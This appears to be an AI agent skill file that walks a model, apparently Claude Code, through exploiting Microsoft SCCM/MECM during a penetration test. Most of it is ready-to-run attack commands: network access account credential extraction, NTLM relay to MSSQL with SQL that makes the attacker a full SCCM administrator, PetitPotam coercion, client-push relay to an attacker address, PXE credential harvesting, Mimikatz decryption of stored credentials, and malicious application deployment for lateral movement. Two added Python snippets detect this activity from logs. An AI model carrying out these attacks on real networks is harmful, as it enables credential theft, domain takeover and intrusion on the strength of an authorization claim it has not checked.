| name | sccm-exploitation |
|---|---|
| description | Enumerates and exploits Microsoft SCCM/MECM (System Center Configuration Manager / Microsoft Endpoint Configuration Manager) infrastructure for credential harvesting, lateral movement, and domain escalation. Covers SCCM enumeration (sccmhunter, SharpSCCM), Network Access Account (NAA) credential extraction (policy request, WMI DPAPI, WMI repository), management point NTLM relay to MSSQL (TAKEOVER1), client push relay (ELEVATE2), PXE boot media credential harvesting (CRED1), SCCM database credential extraction, application deployment for lateral movement, and SCCM share looting. |
| keywords | ["SCCM","MECM","ConfigMgr","Configuration Manager","management point","sccmhunter","SharpSCCM","NAA","Network Access Account","PXE boot","client push","task sequence","OSD secrets","SCCMContentLib","CMLoot","MalSCCM","SCCM relay"] |
| tools | ["sccmhunter","SharpSCCM","MalSCCM","ntlmrelayx","PetitPotam","pxethiefy","CMLoot","Mimikatz","SQLRecon"] |
| opsec | medium |
SCCM/MECM Exploitation
You are helping a penetration tester enumerate and exploit Microsoft
SCCM/MECM infrastructure for credential harvesting, lateral movement,
and domain escalation. All testing is under explicit written authorization.
Engagement Logging
Check for an ./engagement/ directory. If absent, proceed without logging.
When an engagement directory exists:
- Print [sccm-exploitation] Activated → <target> to the screen on activation.
- Evidence → save significant output to engagement/evidence/ with descriptive filenames (e.g., sqli-users-dump.txt, ssrf-aws-creds.json).
State Management
Call get_state_summary() from the state MCP server to read current
engagement state. Use it to:
- Skip re-testing targets, parameters, or vulns already confirmed
- Leverage existing credentials or access for this technique
- Understand what's been tried and failed (check Blocked section)
Your return summary must include:
- New targets/hosts discovered (with ports and services)
- New credentials or tokens found
- Access gained or changed (user, privilege level, method)
- Vulnerabilities confirmed (with status and severity)
- Pivot paths identified (what leads where)
- Blocked items (what failed and why, whether retryable)
Prerequisites
Access required: Domain user (for enumeration and NAA extraction via
policy request). Local admin on SCCM client (for WMI/DPAPI extraction).
Domain admin or relay position (for MP relay and database attacks).
Kerberos authentication setup (for enumeration):
getTGT.py 'DOMAIN.LOCAL/username:password' -dc-ip DC_IP
export KRB5CCNAME=$(pwd)/username.ccache
Tools: sccmhunter, SharpSCCM, MalSCCM, ntlmrelayx.py, PetitPotam,
pxethiefy/PXEThief/SharpPXE, CMLoot, Mimikatz, SQLRecon.
Privileged Commands
Claude Code cannot execute sudo commands. The following require root and
must be handed off to the user:
- pxethiefy.py — PXE boot credential harvesting (needs raw sockets for DHCP/TFTP)
- ntlmrelayx.py — NTLM relay to SCCM management point MSSQL (needs raw sockets)
Handoff protocol: Present the full command including sudo, ask the user
to run it, then read the output or wait for callback confirmation.
Non-privileged commands Claude can execute directly:
- Enumeration: sccmhunter, SharpSCCM, CMLoot
- Policy extraction: sccmhunter http, sccmhunter show
- Post-exploitation: SQLRecon, MalSCCM, Mimikatz
- Coercion triggers: PetitPotam.py
Step 1: Enumerate SCCM Infrastructure
Discovery via sccmhunter
sccmhunter.py find -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP
sccmhunter.py show -siteservers
sccmhunter.py http -u 'user' -p 'Password123' -d DOMAIN.LOCAL -dc-ip DC_IP -auto
SharpSCCM (from compromised Windows host)
# Enumerate devices managed by site server
.\SharpSCCM.exe get devices --server SCCM01 --site-code P01
Unauthenticated MP Endpoints
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPKEYINFORMATIONMEDIA | xmllint --format -
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?MPLIST | xmllint --format -
curl -s http://MP01.domain.local/SMS_MP/.sms_aut?SITESIGNCERT | xmllint --format -
These HTTP endpoints are unauthenticated and reveal site structure.
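Detection for the endpoint queries above, written from the defender's side as an added example (not part of this skill or of sccmhunter): it parses IIS W3C logs from the management point and reports source addresses outside a known-client allowlist that hit two or more of the three .sms_aut queries. Managed clients query these endpoints legitimately, so the allowlist and threshold matter; the sample log lines, the allowlist and the field layout are constructed assumptions.

```python
"""Flag recon-style queries to the unauthenticated SCCM MP endpoints in IIS W3C logs."""
from collections import defaultdict

# The three .sms_aut queries named in the enumeration step.
WATCHED = {"MPKEYINFORMATIONMEDIA", "MPLIST", "SITESIGNCERT"}

# Constructed sample in IIS W3C format (not real logs); 10.0.2.30 is a managed client.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 10.0
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip cs(User-Agent) sc-status
2024-05-01 10:00:01 10.0.0.5 GET /SMS_MP/.sms_aut MPKEYINFORMATIONMEDIA 10.0.9.77 curl/8.5.0 200
2024-05-01 10:00:02 10.0.0.5 GET /SMS_MP/.sms_aut MPLIST 10.0.9.77 curl/8.5.0 200
2024-05-01 10:00:03 10.0.0.5 GET /SMS_MP/.sms_aut SITESIGNCERT 10.0.9.77 curl/8.5.0 200
2024-05-01 10:01:00 10.0.0.5 GET /SMS_MP/.sms_aut MPLIST 10.0.2.30 ccmhttp 200
2024-05-01 10:02:00 10.0.0.5 GET /ccm_system/request - 10.0.2.30 ccmhttp 200
"""

def parse_w3c(text):
    """Yield one dict per record, keyed by the most recent #Fields header."""
    fields = None
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#") or fields is None:
            continue
        parts = line.split()
        if len(parts) == len(fields):
            yield dict(zip(fields, parts))

def find_mp_recon(text, known_clients, min_distinct=2):
    """Return {source ip: sorted watched queries} for sources not in known_clients
    that requested at least min_distinct distinct watched .sms_aut queries."""
    hits = defaultdict(set)
    for rec in parse_w3c(text):
        if rec["cs-uri-stem"].lower() != "/sms_mp/.sms_aut":
            continue
        query = rec["cs-uri-query"].upper()
        if query in WATCHED and rec["c-ip"] not in known_clients:
            hits[rec["c-ip"]].add(query)
    return {ip: sorted(qs) for ip, qs in hits.items() if len(qs) >= min_distinct}
```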
Attack Path Decision Tree
SCCM Infrastructure Found
├── Have local admin on SCCM client? → Step 3 (NAA from WMI/DPAPI — quietest)
├── Can create machine account? → Step 2 (NAA via policy request)
├── Can reach MP + MSSQL? → Step 4 (MP relay to MSSQL)
├── Auto client push enabled? → Step 5 (Client push relay)
├── PXE-enabled DP? → Step 6 (PXE boot credential harvesting)
├── Have SCCM admin or DB access? → Step 7 (Database credential extraction)
└── Have SCCM admin? → Step 8 (Application deployment for lateral movement)
Step 2: NAA Extraction via Policy Request (CRED-2)
Extract Network Access Account credentials by requesting machine policy
from the management point. Requires a machine account (real or created).
Create Machine Account + Request Policy
addcomputer.py -computer-name 'fakesccm$' -computer-pass 'Password123!' \
'DOMAIN.LOCAL/user:pass' -dc-ip DC_IP
echo "SCCM_IP SCCM01 SCCM01.DOMAIN.LOCAL" >> /etc/hosts
python3 sccmwtf.py fake fakepc.domain.local SCCM01 'DOMAIN\fakesccm$' 'Password123!'
grep -A 5 'NetworkAccessUsername\|NetworkAccessPassword' /tmp/naapolicy.xml \
| grep 'CDATA' | cut -d '[' -f 3 | cut -d ']' -f 1 \
| xargs -I {} python3 policysecretunobfuscate.py {}
SharpSCCM Alternative
# From a compromised host (creates new device registration)
.\SharpSCCM.exe get naa -r newdevice -u fakesccm$ -p 'Password123!'
.\SharpSCCM.exe get secrets -u fakesccm$ -p 'Password123!'
Recovered secrets: NetworkAccessUsername, NetworkAccessPassword —
typically a domain account used for SCCM client network access during OSD.
Step 3: NAA Extraction from Running Client (CRED-3 / CRED-4)
Extract NAA credentials from a compromised SCCM client's local WMI store.
Requires local administrator on the SCCM client.
WMI Query + DPAPI Decryption (CRED-3)
# Query NAA from WMI (DPAPI-encrypted blobs)
Get-WmiObject -Namespace "root\ccm\policy\Machine\ActualConfig" -Class "CCM_NetworkAccessAccount"
# Output: NetworkAccessPassword = <![CDATA[E600000001...]]>
# Decrypt with SharpSCCM (automated)
.\SharpSCCM.exe local secrets -m wmi
# Decrypt with SharpDPAPI (manual)
$str = "060...F2DAF" # Hex from WMI output
# Decode the hex string into bytes, two characters per byte
$bytes = [byte[]]::new($str.Length / 2)
for ($i = 0; $i -lt $bytes.Length; $i++) {
    $bytes[$i] = [Convert]::ToByte($str.Substring($i * 2, 2), 16)
}
# Skip the 4-byte length prefix; the remainder is the DPAPI blob
$b64 = [Convert]::ToBase64String($bytes[4..($bytes.Length - 1)])
.\SharpDPAPI.exe blob /target:$b64 /mkfile:masterkeys.txt
WMI Repository Search (CRED-4 — Legacy)
# Search WMI repository file for encrypted secrets
.\SharpDPAPI.exe search /type:file /path:C:\Windows\System32\wbem\Repository\OBJECTS.DATA
# SharpSCCM automated disk search
.\SharpSCCM.exe local secrets -m disk
sccmhunter HTTP Method (Remote)
sccmhunter.py http -u 'admin' -p 'Password' -d DOMAIN.LOCAL -dc-ip DC_IP -auto
Step 4: Management Point Relay to MSSQL (TAKEOVER-1)
Relay the management point's NTLM authentication to the SCCM database
to gain sysadmin access and extract OSD policy secrets.
Prerequisites: Network access to MP and MSSQL, ability to coerce
MP authentication (PetitPotam/PrinterBug/DFSCoerce).
Start Relay Listener
ntlmrelayx.py -ts -t mssql://MSSQL_IP -socks -smb2support
ntlmrelayx.py -smb2support -ts -t mssql://MSSQL_IP -q "USE CM_P01; \
INSERT INTO RBAC_Admins (AdminSID,LogonName,IsGroup,IsDeleted,CreatedBy,CreatedDate,ModifiedBy,ModifiedDate,SourceSite) \
VALUES (0x<YOUR_SID_HEX>,'DOMAIN\\your_user',0,0,'','','','','P01'); \
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00ALL','29'); \
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00001','1'); \
INSERT INTO RBAC_ExtendedPermissions (AdminID,RoleID,ScopeID,ScopeTypeID) \
VALUES ((SELECT AdminID FROM RBAC_Admins WHERE LogonName = 'DOMAIN\\your_user'),'SMS0001R','SMS00004','1');"
Coerce MP Authentication
python3 PetitPotam.py RELAY_LISTENER_IP MP_IP -u user -p pass -d DOMAIN -dc-ip DC_IP
Extract OSD Secrets via SOCKS Proxy
proxychains mssqlclient.py -windows-auth 'DOMAIN/MP01$'@MSSQL_IP
USE CM_P01;
SELECT SMS_Unique_Identifier0 FROM dbo.UnknownSystem_DISC WHERE DiscArchKey = 2;
EXEC MP_GetMachinePolicyAssignments N'<GUID>', N'';
EXEC MP_GetPolicyBody N'{POLICY_ID}', N'2.00';
Decrypt Policy Blob
echo 'fffe3c003f0078...' | xxd -r -p > policy.xml
python3 pxethief.py 7 $(xmlstarlet sel -t -v "//value/text()" policy.xml)
Recovers: OSDJoinAccount/Password, NetworkAccessUsername/Password, and
other task sequence variable credentials.
sccmhunter Automated MSSQL Path
sccmhunter.py mssql -u user -p pass -d DOMAIN.LOCAL -dc-ip DC_IP \
-tu your_user -sc P01 -stacked
Step 5: Client Push Account Relay (ELEVATE-2)
If automatic site-wide client push is enabled, trigger the SCCM site
server to authenticate as the client push account and relay it.
ntlmrelayx.py -t mssql://MSSQL_IP -smb2support
.\SharpSCCM.exe invoke client-push -t ATTACKER_IP
SCCM site server authenticates as the client push installation account
to your IP — relay to MSSQL for sysadmin or to LDAP for RBCD/machine
account creation.
Conditions: Automatic site-wide client push enabled + automatic
device approval + NTLM fallback allowed.
Step 6: PXE Boot Credential Harvesting (CRED-1)
Extract credentials from PXE-enabled Distribution Points.
pxethiefy (Linux)
sudo python3 pxethiefy.py explore -i eth0
SharpPXE (Windows)
# Send PXE boot request, download variables.dat via TFTP
.\SharpPXE.exe
# If password-protected: outputs $sccm$aes128$... for Hashcat
Manual TFTP Download
tftp MP01.domain.local
tftp> get SMSBoot\\x64\\pxe\\variables.dat
cp hash.txt engagement/evidence/sccm-pxe-hash.txt
Do NOT crack hashes in this skill. Save the PXE hash to
engagement/evidence/ and return to the orchestrator with the hash file path,
hash type (SCCM PXE / hashcat mode 31100), and a routing recommendation to
credential-recovery.
Recovered: Management Point URL, site code, media GUIDs, potentially
task sequence credentials.
Step 7: Database Credential Extraction (CRED-5)
Extract all encrypted credentials from the SCCM database's SC_UserAccount
table. Requires sysadmin access to the database (via relay or direct).
Mimikatz (Direct SCCM Decryption)
# Queries SC_UserAccount + decrypts all credentials
mimikatz # misc::sccm /connectionstring:"DRIVER={SQL Server};Trusted=true;DATABASE=CM_P01;SERVER=MSSQL01;"
SQLRecon
# On site server where DB is local
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:sDecryptCredentials
# Manual extraction
.\SQLRecon.exe /auth:WinToken /host:MSSQL01 /database:CM_P01 /module:query /command:"SELECT * FROM SC_UserAccount"
Manual Decryption
sccmdecryptpoc.exe 0C010000080...5D6F0
Step 8: Application Deployment for Lateral Movement
Deploy malicious applications to device collections for code execution
on target machines. Requires SCCM admin access.
MalSCCM (Full Chain)
# 1. Enumerate targets
MalSCCM.exe locate
MalSCCM.exe inspect /computers
# 2. Create device collection
MalSCCM.exe group /create /groupname:TargetGroup /grouptype:device
# 3. Add target hosts
MalSCCM.exe group /addhost /groupname:TargetGroup /host:TARGET01
# 4. Create application (UNC path to payload on SCCMContentLib$)
MalSCCM.exe app /create /name:update /uncpath:"\\\\SCCM01\\SCCMContentLib$\\payload.exe"
# 5. Deploy to group
MalSCCM.exe app /deploy /name:update /groupname:TargetGroup /assignmentname:deploy01
# 6. Force immediate checkin
MalSCCM.exe checkin /groupname:TargetGroup
# 7. Cleanup
MalSCCM.exe app /cleanup /name:update
MalSCCM.exe group /delete /groupname:TargetGroup
SharpSCCM (Simpler Execution)
# Direct command execution on device
.\SharpSCCM.exe exec -d TARGET01 -p "C:\Windows\System32\cmd.exe /c whoami > C:\temp\out.txt" -s
SCCM Share Looting (CMLoot)
# Inventory all files on SCCM shares
Invoke-CMLootInventory -SCCMHost SCCM01.domain.local -Outfile sccmfiles.txt
# Download interesting files
Invoke-CMLootDownload -InventoryFile .\sccmfiles.txt -Extension msi
Invoke-CMLootDownload -SingleFile '\\SCCM01\SCCMContentLib$\DataLib\SC100001.1\x86\config.xml'
SCCMContentLib$ is world-readable and may contain application binaries,
task sequence XML with embedded credentials, and configuration files.
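A client-side detection for the deployment patterns in this step, added here as an example and not part of this skill, MalSCCM or SharpSCCM: it parses the CMTrace record format used by the logs under C:\Windows\CCM\Logs\ and flags AppEnforce entries whose command line runs from an SCCMContentLib$ UNC path or through cmd.exe/powershell.exe. The sample records are constructed and their message wording is illustrative, so the match patterns are assumptions to tune against real AppEnforce.log output.

```python
"""Parse CMTrace-format SCCM client logs and flag suspicious AppEnforce entries."""
import re

# One CMTrace record: <![LOG[message]LOG]!><time="..." date="..." component="..." ... type="N" ...>
CMTRACE_RE = re.compile(
    r'<!\[LOG\[(?P<msg>.*?)\]LOG\]!>'
    r'<time="(?P<time>[^"]*)"\s+date="(?P<date>[^"]*)"\s+component="(?P<component>[^"]*)"'
    r'[^>]*\btype="(?P<type>\d)"', re.S)

# Patterns matching the deployment shapes used above (assumed; tune per environment).
SUSPICIOUS = [
    ("content from SCCMContentLib$ share", re.compile(r'\\\\[^\\]+\\SCCMContentLib\$', re.I)),
    ("shell interpreter as application", re.compile(r'\bcmd\.exe\b|\bpowershell\.exe\b', re.I)),
]

# Constructed AppEnforce.log-style records; wording is illustrative, not verbatim client output.
SAMPLE_LOG = r'''<![LOG[+++ Starting Install enforcement for App DT "update" ...]LOG]!><time="10:05:01.120+000" date="05-01-2024" component="AppEnforce" context="" type="1" thread="4120" file="appprovider.cpp:1234">
<![LOG[    Executing Command line: "\\SCCM01\SCCMContentLib$\payload.exe" with system context]LOG]!><time="10:05:01.200+000" date="05-01-2024" component="AppEnforce" context="" type="1" thread="4120" file="appexcnlib.cpp:244">
<![LOG[    Executing Command line: msiexec /i "C:\Windows\ccmcache\a1\7zip.msi" /q]LOG]!><time="10:20:00.000+000" date="05-01-2024" component="AppEnforce" context="" type="1" thread="5000" file="appexcnlib.cpp:244">
<![LOG[    Executing Command line: C:\Windows\System32\cmd.exe /c whoami > C:\temp\out.txt with system context]LOG]!><time="10:30:00.000+000" date="05-01-2024" component="AppEnforce" context="" type="1" thread="5100" file="appexcnlib.cpp:244">
'''

def parse_cmtrace(text):
    """Return one dict (msg, time, date, component, type) per CMTrace record."""
    return [m.groupdict() for m in CMTRACE_RE.finditer(text)]

def flag_enforcements(text):
    """Return [(timestamp, reason, message)] for AppEnforce records matching SUSPICIOUS."""
    flagged = []
    for rec in parse_cmtrace(text):
        if rec["component"] != "AppEnforce":
            continue
        for reason, pat in SUSPICIOUS:
            if pat.search(rec["msg"]):
                flagged.append((f'{rec["date"]} {rec["time"]}', reason, rec["msg"].strip()))
                break
    return flagged
```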
Step 9: Escalate or Pivot
STOP and return to the orchestrator with:
- What was achieved (RCE, creds, file read, etc.)
- New credentials, access, or pivot paths discovered
- Context for next steps (platform, access method, working payloads)
Troubleshooting
sccmhunter find Returns Nothing
- Verify LDAP connectivity: nxc ldap DC_IP -u user -p pass
- SCCM objects may be in a different naming context — try a manual LDAP search for the mSSMSSite objectClass
- Site server may not be registered in AD (standalone) — scan the network for port 80/443 on servers and check the /SMS_MP/ endpoint
Policy Request Fails (NAA Extraction)
- Management point may require PKI client certificate — check MP
configuration for "HTTPS only" mode
- Machine account may not be registered — use SharpSCCM to register
a new device identity
- DNS must resolve the MP hostname — add an /etc/hosts entry
Relay to MSSQL Fails
- SMB signing may be required on the MSSQL host — check with nxc smb MSSQL_IP for signing status
- MSSQL may not accept relay — Extended Protection for Authentication
(EPA) blocks relay on modern SQL Server
- Verify MP is sysadmin on DB — try SOCKS proxy after relay to confirm
PXE Boot Extraction Fails
- PXE must be enabled on Distribution Point — check registry
HKLM\Software\Microsoft\SMS\DP\PxeInstalled
- Need network reachability on UDP 4011 (DHCP proxy) and UDP 69 (TFTP)
- If password-protected: extract hash and route to credential-recovery (mode 31100)
Application Deployment Not Executing
- Default GPUpdate interval is 90 minutes — use MalSCCM.exe checkin or gpupdate /force on the target
- Verify the device is in the collection: MalSCCM.exe inspect /groups
- Check SCCM client logs on the target: C:\Windows\CCM\Logs\
KRB_AP_ERR_SKEW (Clock Skew)
Kerberos requires clocks within 5 minutes of the DC. This is a Clock Skew
Interrupt — stop immediately and return to the orchestrator. Do not retry or
fall back to NTLM. The fix requires root:
sudo ntpdate DC_IP
sudo rdate -n DC_IP
OPSEC Comparison
| Technique | OPSEC | Detection | Prerequisites |
|---|---|---|---|
| SCCM enumeration (sccmhunter find) | Low-Medium | LDAP queries | Domain user |
| MP HTTP endpoint queries | Low | IIS logs | Network access |
| NAA from WMI (CRED-3) | Low | Local execution | Local admin on client |
| NAA from WMI repository (CRED-4) | Low | File access | Local admin on client |
| NAA via policy request (CRED-2) | Medium-High | Machine account creation + MP logs | Domain user |
| SCCM share looting (CMLoot) | Low | SMB access logs | Domain user |
| PXE boot harvesting (CRED-1) | Medium | DHCP/TFTP logs on DP | Network access |
| MP relay to MSSQL (TAKEOVER-1) | High | Coercion + relay + SQL audit | Network position |
| Client push relay (ELEVATE-2) | High | Server logs + auth events | Client push enabled |
| Database extraction (CRED-5) | High | SQL audit logs | DB sysadmin |
| Application deployment | High | Extensive SCCM + client logs | SCCM admin |